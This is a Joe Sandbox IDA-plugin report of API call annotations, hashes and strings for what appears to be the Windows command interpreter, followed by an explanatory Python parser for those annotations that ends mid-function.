• Opcode ID: 59bbc784d351ff3a2063a52a3945ebcb68d98e23fb98717ba8864d831c69120d
• Instruction ID: 40129b59ece035726648d4daafbc946a6b30cbf54e0b10bbc32e10865ec68a96
• Opcode Fuzzy Hash: 59bbc784d351ff3a2063a52a3945ebcb68d98e23fb98717ba8864d831c69120d
• Instruction Fuzzy Hash: 45116B3670112197C6247B195814B3F6FD9FFC6B11F0900ECEA079B2D0CF21AE12A6DA
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00B0BDB3,00000000,?), ref: 00B0DD37
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B0DD3E
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00B0DD53
• HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B0DD5A
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: Heap$Process$AllocSize
• String ID:
• API String ID: 2549470565-0
• Opcode ID: 445faaa9e5174ea915f954137f18543d47552286e151f5ea352908a9d3f12cc8
• Instruction ID: 95b95438ad90465fdfcbbed4870839c1bc77f169074df6bfa909c7647cd45ae4
• Opcode Fuzzy Hash: 445faaa9e5174ea915f954137f18543d47552286e151f5ea352908a9d3f12cc8
• Instruction Fuzzy Hash: CD01B176240201ABD721ABA4EC88F9ABBE8FB81796F6041B5F509D70D0DB31DD44C7A0
APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00B08A51), ref: 00B284B9
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00B08A51), ref: 00B284C6
• FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B08A51), ref: 00B284EA
• SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00B08A51), ref: 00B284F2
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
• String ID:
• API String ID: 1033415088-0
• Opcode ID: 2caa99b949499657130207566896d93587a48b5a8826ae61709cdf61f0d3b341
• Instruction ID: 979cd97d6a86c03d6b384004050305896e326fcb37fad0c3ce28305783a80a48
• Opcode Fuzzy Hash: 2caa99b949499657130207566896d93587a48b5a8826ae61709cdf61f0d3b341
• Instruction Fuzzy Hash: 19014476A01129AF9B05AB749C959FFB7ECFF0E710B000169F516E3250EE249E06C765
APIs
  • Part of subcall function 00B10060: wcschr.MSVCRT ref: 00B1006C
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00B15678
• _open_osfhandle.MSVCRT ref: 00B1568C
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00B156A2
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B2122B
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
• String ID:
• API String ID: 22757656-0
• Opcode ID: 1c9012b433a04cb76752bf7e971354082a08de76817b76815d9bc370c5ff9931
• Instruction ID: 0d91418f8224638de1a15994a94eaa3f08f7f2607280ca0f921132ec33de9b7f
• Opcode Fuzzy Hash: 1c9012b433a04cb76752bf7e971354082a08de76817b76815d9bc370c5ff9931
• Instruction Fuzzy Hash: 3F01A775900120FED7206BA8AC4DB9EBBE8E786734F604255F821E32E0DBB049458691
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00B222F8), ref: 00B22514
• RtlFreeHeap.NTDLL ref: 00B2251B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00B222F8), ref: 00B22539
• RtlFreeHeap.NTDLL ref: 00B22540
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: ac8c076bdc288465cf1e3732de81144f03b4c84bede8ea93ce4791a61ac0118b
• Instruction ID: de4af392bbf868dd065885410d4118b5b5c4da7090608b399331f82e61106349
• Opcode Fuzzy Hash: ac8c076bdc288465cf1e3732de81144f03b4c84bede8ea93ce4791a61ac0118b
• Instruction Fuzzy Hash: E7F06272650211AFE7149FA0EC88B65B7F8FF59312F10092DE145D7040DB74EAA5CBA1
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00B0885E), ref: 00B08B9D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0885E), ref: 00B08BA4
  • Part of subcall function 00B0A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00B0A9C5), ref: 00B0A9D8
  • Part of subcall function 00B0A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00B0A9F3
  • Part of subcall function 00B0A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 00B0A9FA
  • Part of subcall function 00B0A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 00B0AA09
  • Part of subcall function 00B0A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00B0AA12
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00B0885E), ref: 00B1B5B5
• RtlFreeHeap.NTDLL ref: 00B1B5BC
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememcpy
• String ID:
• API String ID: 3480822025-0
• Opcode ID: 9c4f43acbc435bb882911ae2235cccbe03802bbfbd06cc564e2fa29daed04dd8
• Instruction ID: 6ccefe5de27bfb6c3b175ac38ed83dc4ad884aa4f7acc255e1dd6678727c6e6c
• Opcode Fuzzy Hash: 9c4f43acbc435bb882911ae2235cccbe03802bbfbd06cc564e2fa29daed04dd8
• Instruction Fuzzy Hash: 02E09A3268932167E6203BF47C1EB862E95EB46B62F050091F285EA1C0DE24C98087A2
APIs
  • Part of subcall function 00B16F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00B16F4F
• __set_app_type.MSVCRT ref: 00B16872
• __p__fmode.MSVCRT ref: 00B16888
• __p__commode.MSVCRT ref: 00B16896
• __setusermatherr.MSVCRT ref: 00B168B7
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: d8b66163fc3fd4214182de219ee84007f0edf14ed0d66f82dce57ff0788db4c1
• Instruction ID: 0b518dd8ff52bdba04f7502c6048f5266e2b2ff5480262936fc08c94dd10fc07
• Opcode Fuzzy Hash: d8b66163fc3fd4214182de219ee84007f0edf14ed0d66f82dce57ff0788db4c1
• Instruction Fuzzy Hash: 4FF0F8345543008FD7287F31FC0A5483BA1BB06321B500A99F471932F5EF39D182CB06
APIs
• _get_osfhandle.MSVCRT ref: 00B29F24
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00B2449C,?,?,00000001,?), ref: 00B29F2C
• _get_osfhandle.MSVCRT ref: 00B29F42
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00B2449C,?,?,00000001,?), ref: 00B29F4A
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
• Opcode ID: 46bcf2ad5ece676788014980c835dd2631ed7b1db184de1a4537516701943669
• Instruction ID: 15dabba5d6420fddc841bfe2259331d74edaab00e6d535e640a516bd28472370
• Opcode Fuzzy Hash: 46bcf2ad5ece676788014980c835dd2631ed7b1db184de1a4537516701943669
• Instruction Fuzzy Hash: E2E04F76540205FFEB009BB0ED0EBAE7B6CFB05364F100545F529D71D1DEB5EA009622
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B0824E
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B08256
                                                                            • _get_osfhandle.MSVCRT ref: 00B08264
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B0826C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleMode_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 1606018815-0
                                                                            • Opcode ID: c7246065b22c2e49ff9e4f55fa044a515ac4d31f566bc484650ac9b4ab6bb2e9
                                                                            • Instruction ID: 4416c6b8d1bdc8f627afd7f4a9b86993596b72f8a78271b63e1c0cb99e80eaa5
                                                                            • Opcode Fuzzy Hash: c7246065b22c2e49ff9e4f55fa044a515ac4d31f566bc484650ac9b4ab6bb2e9
                                                                            • Instruction Fuzzy Hash: 28E026BA5442049FDB049FA4FD1EA693B64F719351B214419F205972B1DFB656009F12
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00B0729C), ref: 00B072CF
                                                                            • RtlFreeHeap.NTDLL ref: 00B072D6
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00B072DF
                                                                            • RtlFreeHeap.NTDLL ref: 00B072E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3859560861-0
                                                                            • Opcode ID: 75e6f81cef7cd096419c5f7521a9a74d44b0d5e856e21e19464a27893b6d2504
                                                                            • Instruction ID: 9ee754b4d2bf73b6a8bff10e3c1ed676e300a89eb4fa399b6563c7e626b5e52e
                                                                            • Opcode Fuzzy Hash: 75e6f81cef7cd096419c5f7521a9a74d44b0d5e856e21e19464a27893b6d2504
                                                                            • Instruction Fuzzy Hash: 55D0C936485150ABE7503FE0BC0DF863E28FF4B313F010401F205A30608EB449108B62
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                              • Part of subcall function 00B0A62F: wcschr.MSVCRT ref: 00B0A635
                                                                              • Part of subcall function 00B0C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00B0C5BD
                                                                              • Part of subcall function 00B0C570: RtlFreeHeap.NTDLL ref: 00B0C5C4
                                                                              • Part of subcall function 00B0C570: _setjmp3.MSVCRT ref: 00B0C630
                                                                            • _wcsupr.MSVCRT ref: 00B1C21F
                                                                              • Part of subcall function 00B11A47: memset.MSVCRT ref: 00B11AE2
                                                                              • Part of subcall function 00B11A47: ??_V@YAXPAX@Z.MSVCRT(00B12229,?,00B12229,00000000,-00000105,?,00000000,00000000), ref: 00B11BA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                            • String ID: FOR$ IF
                                                                            • API String ID: 3818062306-2924197646
                                                                            • Opcode ID: ad4a4332714d9ab62a7e7bc9def6eded095e68bc8766bf4158ea632365e063d5
                                                                            • Instruction ID: 249ea9dc8d16540f8f2fcd3f7bc3f78ea36814ae73a36be1a4f3325a33452c8a
                                                                            • Opcode Fuzzy Hash: ad4a4332714d9ab62a7e7bc9def6eded095e68bc8766bf4158ea632365e063d5
                                                                            • Instruction Fuzzy Hash: 0D5107217802025BDB296B7888517BB2AE2EF91B54FA841F5D906DB2D6FF71DD81C380
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • wcschr.MSVCRT ref: 00B2BF88
                                                                            • memcpy.MSVCRT(00000000,?,00B29E02,00B2CD80,00000030,00B2448F,?,?,?,00000001), ref: 00B2C008
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocProcessmemcpywcschr
                                                                            • String ID: &()[]{}^=;!%'+,`~
                                                                            • API String ID: 3241892172-381716982
                                                                            • Opcode ID: 5bd4376285be2adadfc96837106d86a03679bf425627e4dfa98ef624be10c98a
                                                                            • Instruction ID: 4c53cad7f2b286be2d0e28a74c4f1f3d335551ee81e492573091501bc3533896
                                                                            • Opcode Fuzzy Hash: 5bd4376285be2adadfc96837106d86a03679bf425627e4dfa98ef624be10c98a
                                                                            • Instruction Fuzzy Hash: CF612271E04225DBCF18CF69E990AADBBF1FF48314B2481AEE81AE7250DB719D418F54
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 00B0ABE3
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                              • Part of subcall function 00B0CF10: _setjmp3.MSVCRT ref: 00B0CF28
                                                                              • Part of subcall function 00B0CF10: iswspace.MSVCRT ref: 00B0CF6B
                                                                              • Part of subcall function 00B0CF10: wcschr.MSVCRT ref: 00B0CF8D
                                                                              • Part of subcall function 00B0CF10: iswdigit.MSVCRT ref: 00B0CFEE
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • longjmp.MSVCRT(00B40A30,00000001,00000000,00000000,00000002), ref: 00B1CB58
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
                                                                            • String ID: REM/?
                                                                            • API String ID: 49548326-4093888634
                                                                            • Opcode ID: 5d24036834e884c707656617d5e55a61391607bd2506aec63cda7a9abdfdb5a4
                                                                            • Instruction ID: 07ae0db54e4a2dd26cbf3854358f8a2ab6105599fa907c78264ac3e1e3c7ce71
                                                                            • Opcode Fuzzy Hash: 5d24036834e884c707656617d5e55a61391607bd2506aec63cda7a9abdfdb5a4
                                                                            • Instruction Fuzzy Hash: A031E632754305ABE724EB74AC52B6B7BE5EF80710F2059BAE502CB2D1DEB1CD418356
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00B2CD40,0000001C,00B26901), ref: 00B256A8
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00B25778
                                                                              • Part of subcall function 00B264DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B2650F
                                                                              • Part of subcall function 00B264DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00), ref: 00B26545
                                                                              • Part of subcall function 00B264DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B26553
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                            • String ID: Software\Classes
                                                                            • API String ID: 1047774138-1656466771
                                                                            • Opcode ID: 42ca7bbf0065f1eded0c680aab44957c8d8f948ae690c759955cad9e0c488c5c
                                                                            • Instruction ID: cd1fd71b5e492e033a12edd7863bb68bbd5413f294615926a79e53b967cb95a0
                                                                            • Opcode Fuzzy Hash: 42ca7bbf0065f1eded0c680aab44957c8d8f948ae690c759955cad9e0c488c5c
                                                                            • Instruction Fuzzy Hash: 87315471E54724DBDB28AFA8A8556AD76F1EF48710F1484AEE406B72E1EE705C408B60
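The blocks above are the Joe Sandbox IDA plugin's per-function API annotations: one line per call site, with the import name, the module it resolves through, the argument values recovered from the stack (`?` where none could be recovered) and the call-site address, plus "Part of subcall function" lines for callees. The following Python is an added example, not part of the report or of the analysed sample, that parses lines of this form into structured records and decodes the hive and access mask of the `RegOpenKeyExW`/`RegCreateKeyExW` calls in the block directly above. The `SAMPLE` text is copied from that block; the hive values and access-right names are the standard Win32 constants. One reading caveat for this image: the `FOR`/`IF`/`REM` keywords and the `&()[]{}^=;!%'+,\`~` metacharacter string in the neighbouring blocks are the strings of the cmd.exe command parser, so these registry accesses under `HKLM\Software\Classes` (opened with `MAXIMUM_ALLOWED`, with `KEY_SET_VALUE` and `RegSetValueExW` in the callee) are most plausibly the interpreter's own code rather than payload logic; that is an inference from the visible strings, not something the report states.

```python
"""Parse Joe Sandbox 'APIs' annotation lines into structured calls.

Added example; not part of the Joe Sandbox report or the analysed sample.
SAMPLE is copied from the report block above; HIVES/ACCESS are Win32 constants.
"""
import re
from dataclasses import dataclass, field
from typing import Optional, Union

# One annotation line: optional "Part of subcall function XXXXXXXX:" prefix,
# then Api.Module, an optional "(args)" list, and "ref: <call-site address>".
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^\s(]+?)\.(?P<mod>[A-Za-z0-9\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
# Registry access rights (winnt.h); composite masks first so they win over their parts.
ACCESS = [
    (0x02000000, "MAXIMUM_ALLOWED"),
    (0x000F003F, "KEY_ALL_ACCESS"),
    (0x00020019, "KEY_READ"),
    (0x00020006, "KEY_WRITE"),
    (0x00000100, "KEY_WOW64_64KEY"),
    (0x00000200, "KEY_WOW64_32KEY"),
    (0x00000002, "KEY_SET_VALUE"),
    (0x00000001, "KEY_QUERY_VALUE"),
]

Arg = Union[int, str, None]  # None marks an argument the plugin left as "?"

@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                          # address of the call site
    args: list = field(default_factory=list)
    subcall: Optional[str] = None     # callee address for "Part of subcall function" lines

def _arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"-?[0-9A-F]{8}", tok):
        return int(tok, 16)           # 8-digit hex (possibly negative) stack value
    return tok                        # a string argument such as Software\Classes

def parse_api_block(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue                  # headers such as "APIs" / "Strings" carry no call
        args = [_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append(ApiCall(m["api"], m["mod"], int(m["ref"], 16), args, m["sub"]))
    return calls

def decode_access(mask: int) -> list[str]:
    names, rest = [], mask
    for bit, name in ACCESS:
        if (rest & bit) == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))       # bits not covered by the table
    return names

def describe_reg_open(call: ApiCall) -> Optional[dict]:
    """Decode hive, subkey and samDesired of a RegOpenKeyExW / RegCreateKeyExW call."""
    if call.api not in ("RegOpenKeyExW", "RegCreateKeyExW") or len(call.args) < 6:
        return None
    hive, subkey = call.args[0], call.args[1]
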